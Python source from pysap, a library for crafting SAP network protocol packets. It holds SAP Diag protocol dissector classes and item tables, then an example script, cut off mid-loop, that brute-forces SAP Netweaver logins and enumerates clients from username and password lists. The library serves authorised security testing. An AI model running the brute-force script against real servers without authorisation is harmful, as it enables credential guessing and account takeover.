        if self.options.consolelog:  # To console file if specified
            self.options.consolelog.write(str(string) + "\n")

    def _debug(self, string=""):
        if self.options.verbose:
            self._print(string)

    def _error(self, string):
        self._print("Error: " + string)  # To console if log file specified

    # Override of cmd.Cmd methods and hooks

    def preloop(self):
        super(BaseConsole, self).preloop()
        self._hist = []
        self._debug("Entering console " + self.intro)
        self._log(self.ruler * 24)
        self._log(self.intro)

    def postloop(self):
        super(BaseConsole, self).postloop()
        self._debug("Exiting console " + self.intro)
        self._log(self.ruler * 24)
        self._log()

    def precmd(self, line):
        self._hist += [line.strip()]
        self._debug("Executing console command: " + line)
        self._log(self.prompt + str(line))
        return line

    def postcmd(self, stop, line):
        return super(BaseConsole, self).postcmd(stop, line)

    def emptyline(self):
        pass



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from struct import unpack
from collections import defaultdict
# External imports
from scapy.layers.inet import TCP
from scapy.packet import Packet, bind_layers
from scapy.fields import (ByteEnumField, IntField, ByteField, LenField,
                          StrFixedLenField, ConditionalField, FieldLenField,
                          PacketListField, BitField, LEIntField, PacketField,
                          SignedIntField, StrField)
# Custom imports
import pysapcompress
from pysap.SAPNI import SAPNI
from pysap.SAPSNC import SAPSNCFrame
from pysap.utils import (PacketNoPadded, ByteEnumKeysField,
                         ByteMultiEnumKeysField, MutablePacketField,
                         SignedShortField, StrNullFixedLenField,
                         StrEncodedPaddedField)
from pysapcompress import DecompressError, CompressError


class SAPDiagDP(Packet):
    """SAP Diag DP Header packet

    This packet is used for initialization of Diag connections. Usually
    there's no need to change any value more that the terminal.
    """
    name = "SAP Diag DP Header"
    fields_desc = [  # DP Header
        SignedIntField("request_id", -1),
        ByteField("retcode", 0x0a),
        ByteField("sender_id", 0),
        ByteField("action_type", 0),
        IntField("req_info", 0),
        SignedIntField("tid", -1),
        SignedShortField("uid", -1),
        ByteField("mode", 0xff),
        SignedIntField("wp_id", -1),
        SignedIntField("wp_ca_blk", -1),
        SignedIntField("appc_ca_blk", -1),
        LenField("length", None, fmt="<I"),  # The length in the DP Header is the length of the Diag Header (8 bytes) + the Diag Message
                                             # (54 bytes for user_connect+support_data). As the DP Header is the layer after NI during
                                             # initialization, a LenField works fine.
        ByteField("new_stat", 0),
        SignedIntField("unused1", -1),
        SignedShortField("rq_id", -1),
        StrFixedLenField("unused2", "\x20" * 40, 40),
        StrFixedLenField("terminal", "\x00" * 15, 15),
        StrFixedLenField("unused3", "\x00" * 10, 10),
        StrFixedLenField("unused4", "\x20" * 20, 20),
        IntField("unused5", 0),
        IntField("unused6", 0),
        SignedIntField("unused7", -1),
        IntField("unused8", 0),
        ByteField("unused9", 0x01),
        StrFixedLenField("unused10", "\x00" * 57, 57)]

# Diag Item Types
diag_item_types = {
    0x01: "SES",
    0x02: "ICO",
    0x03: "TIT",
    0x07: "DiagMessage",
    0x08: "OKC",
    0x09: "CHL",
    0x0b: "SBA",  # SBA/SFE/SLC
    0x0c: "EOM",
    0x10: "APPL",
    0x11: "DIAG_XMLBLOB",
    0x12: "APPL4",
    0x15: "SBA2",
}
"""Diag Item Types"""

# Diag APPL/APPL4 IDs
diag_appl_ids = {
    0x01: "SCRIPT",
    0x02: "GRAPH",
    0x03: "IXOS",
    0x04: "ST_USER",
    0x05: "DYNN",
    0x06: "ST_R3INFO",
    0x07: "POPU",
    0x08: "RFC_TR",
    0x09: "DYNT",
    0x0a: "CONTAINER",
    0x0b: "MNUENTRY",
    0x0c: "VARINFO",
    0x0e: "CONTROL",
    0x0f: "UI_EVENT",
    0x12: "ACC_LIST",
    0x13: "RCUI",
    0x14: "GUI_PACKET",
}
"""Diag APPL/APPL4 IDs"""

# Diag APPL/APPL4 SIDs
diag_appl_sids = {
    0x01:    # SCRIPT
    {0x01: "SCRIPT_OTF",
     0x02: "SCRIPT_SCREEN",
     0x03: "SCRIPT_POSTSCRIPT",
     0x04: "SCRIPT_ITF"},
    0x02:     # GRAPH
    {0x03: "GRAPH RELEASE 3",
     0x05: "GRAPH RELEASE 5"},
    0x03:    # IXOS
    {0x01: "ABLAGE",
     0x02: "ANZEIGE",
     0x03: "IXOS_COMMAND"},
    0x04:     # ST_USER
    {0x01: "V1",
     0x02: "CONNECT",
     0x03: "SELECTEDRECT",
     0x04: "FONTMETRIC",
     0x05: "TABLEMETRIC",
     0x06: "GUITIME",
     0x07: "GUITIMEZONE",
     0x08: "TURNTIME",
     0x09: "GUIVERSION",
     0x0b: "SUPPORTDATA",
     0x0c: "RFC_CONNECT",
     0x0d: "WSIZE",
     0x0e: "V2",
     0x0f: "TURNTIME2",
     0x10: "RFC_PARENT_UUID",
     0x11: "RFC_NEW_UUID",
     0x12: "RFC_UUIDS",
     0x13: "RFC_UUIDS2",
     0x14: "XML_LOGIN",
     0x15: "XML_TRANSACTION",
     0x16: "SCROLLBAR_WIDTH",
     0x17: "TOOLBAR_HEIGHT",
     0x18: "PASSPORT_DATA",
     0x19: "GUI_STATE",
     0x1a: "DECIMALPOINT",
     0x1b: "LANGUAGE",
     0x1c: "USERNAME",
     0x1d: "GUIPATCHLEVEL",
     0x1e: "WSIZE_PIXEL",
     0x1f: "GUI_OS_VERSION",
     0x20: "BROWSER_VERSION",
     0x21: "OFFICE_VERSION",
     0x22: "JDK_VERSION",
     0x23: "GUIXT_VERSION",
     0x24: "DISPLAY_SIZE",
     0x25: "GUI_TYPE",
     0x26: "DIALOG_STEP_NUMBER"},
    0x05:    # DYNN
    {0x01: "CHL",
     0x03: "XMLPROP DYNPRO"},
    0x06:    # ST_R3INFO
    {0x01: "MODENUMBER",
     0x02: "DBNAME",
     0x03: "CPUNAME",
     0x04: "RFC_TRIGGER",
     0x05: "GUI_LABEL",
     0x06: "DIAGVERSION",
     0x07: "TCODE",
     0x08: "RFC_WAITING",
     0x09: "RFC_REFRESH",
     0x0a: "IMODENUMBER",
     0x0b: "MESSAGE",
     0x0c: "CLIENT",
     0x0d: "DYNPRONAME",
     0x0e: "DYNPRONUMBER",
     0x0f: "CUANAME",
     0x10: "CUASTATUS",
     0x11: "SUPPORTDATA",
     0x12: "RFC_CONNECT_OK",
     0x13: "GUI_FKEY",
     0x14: "GUI_FKEYT",
     0x15: "STOP_TRANS",
     0x16: "RFC_DIAG_BLOCK_SIZE",
     0x17: "USER_CHECKED",
     0x18: "FLAGS",
     0x19: "USERID",
     0x1a: "ROLLCOUNT",
     0x1b: "GUI_XT_VAR",
     0x1c: "IMODEUUID",
     0x1d: "IMODEUUID_INVALIDATE",
     0x1e: "IMODEUUIDS",
     0x1f: "IMODEUUIDS2",
     0x20: "CODEPAGE",
     0x21: "CONTEXTID",
     0x22: "AUTOLOGOUT_TIME",
     0x23: "CODEPAGE_DIAG_GUI",
     0x24: "CODEPAGE_APP_SERVER",
     0x25: "GUI_THEME",
     0x26: "GUI_USER_SCRIPTING",
     0x27: "CODEPAGE_APP_SERVER_1",
     0x28: "TICKET4GUI",
     0x29: "KERNEL_VERSION",
     0x2a: "STD_TOOLBAR_ITEMS", },
    0x07:    # POPU
    {0x02: "DEST"},
    0x08:    # RFC_TR
    {0x00: "RFC_TR_REQ",
     0x01: "RFC_TR_RET",
     0x02: "RFC_TR_ERR",
     0x03: "RFC_TR_RQT",
     0x04: "RFC_TR_MOR",
     0x05: "RFC_TR_MOB",
     0x06: "RFC_TR_RNB",
     0x07: "RFC_TR_RNT",
     0x08: "RFC_TR_DIS",
     0x09: "RFC_TR_CALL",
     0x0a: "RFC_TR_CALL_END",
     0x0b: "RFC_TR_RES"},
    0x09:    # DYNT
    {0x01: "DYNT_FOCUS",
     0x02: "DYNT_ATOM",
     0x03: "DYNT_EVENT_UNUSED",
     0x04: "TABLE_ROW_REFERENCE",
     0x05: "TABLE_ROW_DAT_INPUT_DUMMY",
     0x06: "TABLE_INPUT_HEADER",
     0x07: "TABLE_OUTPUT_HEADER",
     0x08: "TABLE_ROW_DATA_INPUT",
     0x09: "TABLE_ROW_DATA_OUTPUT",
     0x0a: "DYNT_NOFOCUS",
     0x0b: "DYNT_FOCUS_1",
     0x0c: "TABLE_ROW_REFERENCE_1",
     0x0d: "TABLE_FIELD_NAMES",
     0x0e: "TABLE_HEADER",
     0x0f: "DYNT_TABSTRIP_HEADER",
     0x10: "DYNT_TABSTRIP_BUTTONS",
     0x11: "TABLE_ROW_REFERENCE_2",
     0x12: "DYNT_CONTROL_FOCUS",
     0x15: "DYNT_TC_COLUMN_TITLE_XMLP",
     0x16: "DYNT_TC_ROW_SELECTOR_NAME",
     0x17: "DYNT_FOCUS_FRAME"},
    0x0a:    # CONTAINER
    {0x01: "RESET",
     0x02: "DEFAULT",
     0x03: "SUBSCREEN",
     0x04: "LOOP",
     0x05: "TABLE",
     0x06: "NAME",
     0x08: "TABSTRIP",
     0x09: "TABSTRIP_PAGE",
     0x0a: "CONTROL",
     0x0c: "XMLPROP",
     0x0d: "SPLITTER",
     0x0e: "SPLITTER_CELL"},
    0x0b:    # MNUENTRY
    {0x01: "MENU_ACT",
     0x02: "MENU_MNU",
     0x03: "MENU_PFK",
     0x04: "MENU_KYB"},
    0x0c:    # VARINFO
    {0x01: "MESTYPE",
     0x02: "SCROLL_INFOS",
     0x03: "MESTYPE2",
     0x04: "OKCODE",
     0x05: "CONTAINER",
     0x06: "SCROLL_INFOS2",
     0x07: "AREASIZE",
     0x08: "AREA_PIXELSIZE",
     0x09: "SESSION_TITLE",
     0x0a: "SESSION_ICON",
     0x0b: "LIST_CELL_TEXT",
     0x0c: "CONTAINER_LOOP",
     0x0d: "LIST_FOCUS",
     0x0e: "MAINAREA_PIXELSIZE",
     0x0f: "SERVICE_REQUEST"},
    0x0e:    # CONTROL
    {0x01: "CONTROL_PROPERTIES"},
    0x0f:    # UI_EVENT
    {0x01: "UI_EVENT_SOURCE"},
    0x12:    # ACC_LIST
    {0x01: "ACC_LIST_INFO4FIELD",
     0x02: "ACC_LIST_CONTAINER"},
    0x13:    # RCUI
    {0x01: "RCUI_STREAM",
     0x02: "RCUI_SYSTEM_ERROR",
     0x03: "RCUI_SPAGPA",
     0x04: "RCUI_MEMORYID",
     0x05: "RCUI_TXOPTION",
     0x06: "RCUI_VALUE",
     0x07: "RCUI_COMMAND",
     0x08: "RCUI_BDCMSG",
     0x09: "RCUI_CONNECT_DATA"},
    0x14:    # GUI_PACKET
    {0x01: "GUI_PACKET_STATE",
     0x02: "GUI_PACKET_DATA"}
}
"""Diag APPL/APPL4 SIDs"""


def diag_item_is_short(item):
    """Returns if the item has a short length field

    @param item: item to look at
    @type item: L{SAPDiagItem}

    @return: if the item has a short length field (2 bytes)
    @rtype: C{bool}
    """
    return item.item_type == 0x10  # APPL


def diag_item_is_long(item):
    """Returns if the item has a long length field

    @param item: item to look at
    @type item: L{SAPDiagItem}

    @return: if the item has a long length field (4 bytes)
    @rtype: C{bool}
    """
    return item.item_type in [0x11, 0x12]    # DIAG_XMLBLOB or APPL4


def diag_item_is_appl_appl4(item):
    """Returns if an item is APPL or APPL4

    @param item: item to look a
    @type item: L{SAPDiagItem}

    @return: whether the item is a APPL or APPL4 item
    @rtype: C{bool}
    """
    return item.item_type in [0x10, 0x12]    # APPL or APPL4


def diag_item_get_length(item):
    """Returns the item length according to the item_type

    @param item: item to look at
    @type item: L{SAPDiagItem}

    @return: the item length
    @rtype: C{int}
    """
    diag_item_sizes = {
        0x01: 16,                   # SES
        0x02: 20,                   # ICO
        0x03: 3,                    # TIT
        0x07: 76,                   # DiagMessage (old format)
        0x08: 0,                    # OKC XXX: Never seen this, check proper size
        0x09: 22,                   # CHL
        0x0b: 9,                    # SBA/SFE/SLC
        0x0c: 0,                    # EOM
        0x10: item.item_length,     # APPL
        0x11: item.item_length4,    # DIAG_XMLBLOB
        0x12: item.item_length4,    # APPL4
        0x15: 36,                   # SBA2
    }
    return diag_item_sizes[item.item_type]


diag_item_classes = {}
"""Dictionary for registering Diag item classes """


diag_item_appl_classes = defaultdict(defaultdict)
"""Dictionary for registering Diag APPL/APPL4 item classes """


def bind_diagitem(item_class, item_type, item_id=None, item_sid=None):
    """Registers a Diag item class associated to a given type, ID and SID.

    @param item_class: item class to associate
    @type item_class: L{SAPDiagItem} class

    @param item_id: item ID to associate
    @type item_id: C{int}

    @param item_sid: item SID to associate
    @type item_sid: C{int}
    """
    if item_type in [0x10, 0x12, "APPL", "APPL4"]:
        diag_item_appl_classes[item_id][item_sid] = item_class
    else:
        diag_item_classes[item_type] = item_class


def diag_item_get_class(pkt, item_type, item_id, item_sid):
    """Obtains the Diag item class according to the type, ID and SID of the packet.
    If the Type/ID/SID is not registered, returns None.

    @param pkt: the item to look at
    @type pkt: L{SAPDiagItem}

    @param item_type: function that returns the item type
    @type item_type: C{int}

    @param item_id: function that returns the item ID
    @type item_id: C{int}

    @param item_sid: functions that returns the item SID
    @type item_sid: C{int}

    @return: the associated L{SAPDiagItem} class if registered or None
    """
    if item_type in [0x10, 0x12, "APPL", "APPL4"]:
        if item_id in diag_item_appl_classes and item_sid in diag_item_appl_classes[item_id]:
            return diag_item_appl_classes[item_id][item_sid]
        else:
            return None
    else:
        return diag_item_classes.get(item_type)


class SAPDiagItem(PacketNoPadded):
    """SAP Diag Item packet

    This packet holds the different types of Diag items. The value field is
    interpreted according to the Type/ID/SID specified for the item.
    """
    name = "SAP Diag Item"
    fields_desc = [ByteEnumKeysField("item_type", 0, diag_item_types),
                   ConditionalField(ByteEnumKeysField("item_id", 0, diag_appl_ids), diag_item_is_appl_appl4),
                   ConditionalField(ByteMultiEnumKeysField("item_sid", 0, diag_appl_sids, depends_on=lambda item:item.item_id, fmt="B"), diag_item_is_appl_appl4),
                   ConditionalField(FieldLenField("item_length", None, length_of="item_value", fmt="!H"), diag_item_is_short),
                   ConditionalField(FieldLenField("item_length4", None, length_of="item_value", fmt="!I"), diag_item_is_long),
                   MutablePacketField("item_value", None,
                                      length_from=diag_item_get_length,
                                      get_class=diag_item_get_class,
                                      evaluators=[lambda item:item.item_type,
                                                  lambda item:item.item_id,
                                                  lambda item:item.item_sid],
                                      )
                   ]


# SAP Diag Items container
class SAPDiagItems(Packet):
    """SAP Diag Items container

    Container for L{SAPDiagItem} packets.
    """
    name = "SAP Diag Items"
    fields_desc = [PacketListField("message", None, SAPDiagItem)]

# Compression Flag values
diag_compress_values = {0: "Compression switched off",
                        1: "Compression switched on",
                        2: "Data encrypted",
                        3: "Data encrypted wrap"}
"""Compression Flag values"""


# SAP Diag packet
class SAPDiag(PacketNoPadded):
    """SAP Diag packet

    This packet holds the Diag Header and serve as a container for
    L{SAPDiagItem} items. It handles compression/decompression, adding the
    appropriate Compression Header when necessary.
    """
    name = "SAP Diag"
    fields_desc = [
        ByteField("mode", 0),

        # Communication flags
        BitField("com_flag_TERM_GRA", 0, 1),
        BitField("com_flag_TERM_NNM", 0, 1),
        BitField("com_flag_TERM_CAS", 0, 1),
        BitField("com_flag_TERM_INI", 0, 1),
        BitField("com_flag_TERM_EOP", 0, 1),
        BitField("com_flag_TERM_NOP", 0, 1),
        BitField("com_flag_TERM_EOC", 0, 1),
        BitField("com_flag_TERM_EOS", 0, 1),

        ByteField("mode_stat", 0),
        ByteField("err_flag", 0),
        ByteField("msg_type", 0),
        ByteField("msg_info", 0),
        ByteField("msg_rc", 0),
        ByteEnumKeysField("compress", 0, diag_compress_values),

        # Compression Header
        ConditionalField(LEIntField("uncompress_length", None), lambda pkt:pkt.compress == 1),
        ConditionalField(ByteEnumField("algorithm", 0x12, {0x12: "LZH", 0x10: "LZC"}), lambda pkt: pkt.compress == 1),
        ConditionalField(StrFixedLenField("magic_bytes", "\x1f\x9d", 2), lambda pkt: pkt.compress == 1),
        ConditionalField(ByteField("special", 2), lambda pkt: pkt.compress == 1),

        # SNC Frame
        ConditionalField(PacketField("snc_frame", None, SAPSNCFrame), lambda pkt: pkt.compress in [2, 3]),

        # Message info
        ConditionalField(StrEncodedPaddedField("info", None), lambda pkt: pkt.err_flag != 0),

        # Payload
        PacketListField("message", None, SAPDiagItem)]

    def do_compress(self, s):
        """Compress a string using SAP compression C++ extension.

        @param s: string to compress
        @type s: C{string}

        @return: string compression header plus the compressed string
        @rtype: C{string}

        @raise pysapcompress.Error: when a compression error is raised
        """
        if (len(s) > 0):
            # Compress the payload and return the output
            (_, _, outbuffer) = pysapcompress.compress(s, pysapcompress.ALG_LZH)
            return outbuffer

    def do_decompress(self, s, length):
        """Decompress a string using SAP compression C++ extension.

        @param s: compression header plus compressed string
        @type s: C{string}

        @param length: reported compressed length
        @type length: C{int}

        @return: decompressed string
        @rtype: C{string}

        @raise pysapcompress.Error: when a decompression error is raised
        """
        if (len(s) > 0):
            # Decompress the payload and return the output
            (_, _, outbuffer) = pysapcompress.decompress(s, length)
            return outbuffer

    def pre_dissect(self, s):
        """Prepares the packet for dissection. If the compression flag is set,
        decompress the payload.
        """
        # If the compression flag is set, decompress everything after the headers
        if s[7] == "\x01":
            # First need to get the reported decompressed length
            (reported_length, ) = unpack("<I", s[8:12])

            # Then return the headers (Diag and Compression) and the payload (message field)
            try:
                return s[:16] + self.do_decompress(s[8:], reported_length)
            except DecompressError:
                return s
        # Uncompressed packet, just return them
        return s

    def post_build(self, p, pay):
        """Compress the payload. If the compression flag is set, compress both
        the message field and the payload.
        """
        if pay is None:
            pay = ''
        if self.compress == 1:
            payload = "".join([str(item) for item in self.message]) + pay
            if (len(payload) > 0):
                try:
                    return p[:8] + self.do_compress(payload)
                except CompressError:
                    return p + pay
        return p + pay

    def get_item(self, item_type=None, item_id=None, item_sid=None):
        """Get an item from the packet's message. Returns None if the message
        is not found, or a list if the item is found multiple times.

        @param item_type: item type byte or string value
        @type item_type: C{int} or C{string} or C{list}

        @param item_id: item ID byte or string value
        @type item_id: C{int} or C{string} or C{list}

        @param item_sid: item SID byte or string value
        @type item_sid: C{int} or C{string} or C{list}

        @return: list of items found on the packet or None
        @rtype: C{list} of L{SAPDiagItem}
        """
        # Expand list lookups
        items = []
        if item_type is not None and type(item_type) == list:
            for itype in item_type:
                items.extend(self.get_item(itype, item_id, item_sid))
            return items
        if item_id is not None and type(item_id) == list:
            for iid in item_id:
                items.extend(self.get_item(item_type, iid, item_sid))
            return items
        if item_sid is not None and type(item_sid) == list:
            for isid in item_sid:
                items.extend(self.get_item(item_type, item_id, isid))
            return items

        # Perform name lookups
        if item_type is not None and isinstance(item_type, str):
            item_type = list(diag_item_types.keys())[list(diag_item_types.values()).index(item_type)]
        if item_id is not None and isinstance(item_id, str):
            item_id = list(diag_appl_ids.keys())[list(diag_appl_ids.values()).index(item_id)]
        if item_sid is not None and isinstance(item_sid, str):
            item_sid = list(diag_appl_sids[item_id].keys())[list(diag_appl_sids[item_id].values()).index(item_sid)]

        # Filter and return items
        if item_sid is None and item_id is None:
            items = [item for item in self.message if hasattr(item, "item_type") and item.item_type == item_type]
        elif item_sid is None:
            items = [item for item in self.message if hasattr(item, "item_type") and item.item_type == item_type and item.item_id == item_id]
        else:
            items = [item for item in self.message if hasattr(item, "item_type") and item.item_type == item_type and item.item_id == item_id and item.item_sid == item_sid]

        return items


class SAPDiagError(PacketNoPadded):
    """SAP Diag Error packet

    This packet holds Diag error packets.
    """
    name = "SAP Diag Error"
    # TODO: Need to figure out the meaning of the packets
    fields_desc = [
        StrNullFixedLenField("msg", "**DPTMMSG**", length=12),
        StrField("padd", None),
    ]


# Bind SAP NI with the Diag port
bind_layers(TCP, SAPNI, dport=3200)


def diag_guess_diagdp_header(self, payload):
    """Guess if the payload is a L{SAPDiag} or L{SAPDiagDP}, base on the mode field.
    Use this function as guess_payload_class for the L{SAPNI} packet if need to
    dissect L{SAPDiag} packets.
    """
    if self.length == 14 and payload.startswith("**DPTMMSG**\x00"):
        return SAPDiagError
    elif self.length == 17 and payload.startswith("**DPTMOPC**\x00"):
        return SAPDiagError
    elif self.length > 200 + 8 and payload[0] == "\xff":
        return SAPDiagDP
    else:
        return SAPDiag



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from Queue import Queue
from string import letters
from random import choice
from threading import Thread
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI
from pysap.SAPDiag import SAPDiag, SAPDiagDP
from pysap.SAPDiagItems import *
from pysap.SAPDiagClient import SAPDiagConnection


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)


# Set the verbosity to 0
conf.verb = 0


# Simple Thread Pool implementation based on http://code.activestate.com/recipes/577187-python-thread-pool/
# WorkerQueue class
class WorkerQueue(Thread):
    """Thread executing tasks from a given tasks queue"""
    def __init__(self, tasks):
        Thread.__init__(self)
        self.tasks = tasks
        self.daemon = True
        self.start()

    def run(self):
        while True:
            func, args, kargs = self.tasks.get()
            try:
                func(*args, **kargs)
            except Exception as e:
                print(e)
            self.tasks.task_done()


# ThreadPool class
class ThreadPool(object):
    """Pool of threads consuming tasks from a queue"""
    def __init__(self, num_threads):
        self.tasks = Queue(num_threads)
        for _ in range(num_threads):
            WorkerQueue(self.tasks)

    def add_task(self, func, *args, **kargs):
        """Add a task to the queue"""
        self.tasks.put((func, args, kargs))

    def wait_completion(self):
        """Wait for completion of all the tasks in the queue"""
        self.tasks.join()


# Command line options parser
def parse_options():

    description = \
    """This example script can be used to perform a brute force attack
    against a SAP Netweaver application server. The scripts performs a
    login through the Diag protocol. It can also discover available
    clients.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3200)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    credentials = OptionGroup(parser, "Credentials")
    credentials.add_option("-u", "--usernames", dest="usernames", help="Usernames file")
    credentials.add_option("-l", "--passwords", dest="passwords", help="Passwords file")
    credentials.add_option("-m", "--client", dest="client", help="Client number [%default]", default="000,001,066")
    credentials.add_option("-c", "--credentials", dest="credentials", help="Credentials file (username:password:client)")
    credentials.add_option("-t", "--max-tries", dest="max_tries", help="Max tries per username")
    parser.add_option_group(credentials)

    discovery = OptionGroup(parser, "Clients Discovery")
    discovery.add_option("--discovery", dest="discovery", action="store_true", default=False, help="Performs discovery of available clients [%default]")
    discovery.add_option("--discovery-range", dest="discovery_range", help="Client range for the discovery of available clients [%default]", default="000-099")
    parser.add_option_group(discovery)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("--threads", dest="threads", type="int", help="Number of threads [%default]", default=1)
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--terminal", dest="terminal", default=None, help="Terminal name")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


def make_login(username, password, client):

    # SES item
    ses = SAPDiagSES(eventarray=1)

    # Login information is sent to the server as Dynt Atoms
    login_atom = SAPDiagDyntAtom(items=[
        SAPDiagDyntAtomItem(field2_text=client, field2_maxnrchars=3, row=0, group=0, dlg_flag_2=0, dlg_flag_1=0, etype=130, field2_mlen=3, attr_DIAG_BSD_YES3D=1, field2_dlen=len(client), block=1, col=20),
        SAPDiagDyntAtomItem(field2_text=username, field2_maxnrchars=12, row=2, group=0, dlg_flag_2=1, dlg_flag_1=0, etype=130, field2_mlen=12, attr_DIAG_BSD_YES3D=1, field2_dlen=len(username), block=1, col=20),
        SAPDiagDyntAtomItem(field2_text=password, field2_maxnrchars=40, row=3, group=0, dlg_flag_2=1, dlg_flag_1=4, etype=130, field2_mlen=12, attr_DIAG_BSD_YES3D=1, attr_DIAG_BSD_INVISIBLE=1, field2_dlen=len(password), block=1, col=20)])
    # An XML Blob is also required
    xml_blob = """<?xml version="1.0" encoding="sap*"?><DATAMANAGER><COPY id="copy"><GUI id="gui"><METRICS id="metrics" X3="2966" X2="8" X1="8" X0="283" Y3="900" Y2="23" Y1="17" Y0="283"/></GUI></COPY></DATAMANAGER>"""

    return [SAPDiagItem(item_value=ses, item_type=1),
            SAPDiagItem(item_value='\x00\x05\x00\x00\x03\x1c\x13\x1a\x5a\x5b\x15\x5a\x00\x13\x00\x00\x5b\x00\x00\x00\x00\x00', item_type=16, item_id=5, item_sid=1),
            SAPDiagItem(item_value=login_atom, item_type=18, item_id=9, item_sid=2),
            SAPDiagItem(item_value=xml_blob, item_type=17),
            ]


def get_rand(length):
    return ''.join(choice(letters) for _ in range(length))


def login(host, port, terminal, route, username, password, client, verbose, results):
    """
    Perform a login try with the username and password.

    """
    success = False
    status = ''

    # Create the connection to the SAP Netweaver server
    connection = SAPDiagConnection(host, port, terminal=terminal,
                                   compress=False, init=True, route=route)

    # Send the login using the given username, password and client
    response = connection.interact(make_login(username, password, client))

    # If the response contain a MESSAGE item, it could be a error message of the user requesting a password change
    if response[SAPDiag].get_item("APPL", "ST_R3INFO", "MESSAGE"):
        status = response[SAPDiag].get_item("APPL", "ST_R3INFO", "MESSAGE")[0].item_value
        # Check if the password is expired
        if status == "Enter a new password":
            success = True
            status = "Expired password"
        elif status == "E: Log on with a dialog user":
            success = True
            status = "No Dialog user (log on with RFC)"
    # If the ST_USER USERNAME item is set to the username, the login was successful
    elif response[SAPDiag].get_item("APPL", "ST_USER", "USERNAME"):
        st_username = response[SAPDiag].get_item("APPL", "ST_USER", "USERNAME")[0].item_value
        if st_username == username:
            success = True
    # If the response doesn't contain a message item but the Internal Mode Number is set to 1, we have found a successful login
    elif response[SAPDiag].get_item("APPL", "ST_R3INFO", "IMODENUMBER"):
        imodenumber = response[SAPDiag].get_item("APPL", "ST_R3INFO", "IMODENUMBER")[0].item_value
        if imodenumber == "\x00\x01":
            success = True
    # Otherwise, we are dealing with an unknown response
    else:
        status = "Unknown error"

    # Close the connection
    connection.close()

    if verbose:
        print("[*] Results: \tClient: %s\tUsername: %s\tPassword: %s\tValid: %s\tStatus: %s" % (client, username, password, success, status))
    results.append((success, status, username, password, client))


def discover_client(host, port, terminal, route, client, verbose, results):
    """
    Test if a client is available on the application server, by setting the client and using a
    random username/password, and looking at the response's message.

    """

    # Unavailable client
    unavailable = "E: Client %s is not available in this system"

    # If there's a license issue, all clients report this
    license_check = "E: Logon not possible (error in license check)"

    client = "%03d" % client
    login_results = []
    login(host, port, terminal, route, get_rand(8), get_rand(8), client, verbose, login_results)
    (_, status, _, _, client) = login_results[0]

    if status == license_check:
        available = False
    elif status == unavailable % (client):
        available = False
    else:
        available = True

    results.append((client, available, status))


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Testing %s:%d" % (options.remote_host, options.remote_port))

    # Start the thread pool
    pool = ThreadPool(options.threads)

    # If discovery option was specified, discover available clients
    if options.discovery is True:

        # Get the client range to test
        (client_min, client_max) = options.discovery_range.split("-")
        print("[*] Discovering clients (%s-%s) ..." % (client_min, client_max))
        # Add the tasks to the threadpool
        results = []
        for client in range(int(client_min), int(client_max) + 1):
            pool.add_task(discover_client, options.remote_host,
                          options.remote_port, options.terminal,
                          options.route_string, client, options.verbose,
                          results)
        pool.wait_completion()

        # Collect the results
        client_list = []
        for (client, success, status) in results:
            if success:
                client_list.append(client)

        print("[*] Clients found: %s" % ','.join(client_list))
    else:
        print("[*] Not discovering clients, using %s or client supplied in credentials file" % options.client)
        client_list = options.client.split(',')

    # Check if we should test for passwords or finish only with the discovery
    if not options.credentials and not(options.usernames and options.passwords):
        print("[*] Not testing passwords as credentials or usernames/passwords files were not provided")
        exit(0)

    # Build the test cases using either the supplied credentials file (username:password:client) or the username/password file
    testcases = []
    if options.credentials:
        try:
            for line in file(options.credentials, 'r').readlines():
                (username, password, clients) = line.strip().split(':')
                if clients == "*":
                    clients = client_list
                else:
                    clients = clients.split(',')

                for client in clients:
                    testcases.append((username, password, client))
        except IOError:
            print("Error reading credentials file !")
            exit(0)
        except ValueError:
            print("Invalid credentials file format !")
            exit(0)
    else:
        try:
            for username in file(options.usernames, 'r').readlines():
                for password in file(options.passwords, 'r').readlines():
                    for client in client_list:
                        testcases.append((username.strip(), password.strip(), client))
        except IOError:
            print("Error reading username or passwords file !")
            exit(0)

    # Add the test cases to the threadpool
    results = []
    for username, password, client in testcases:
        if options.verbose:
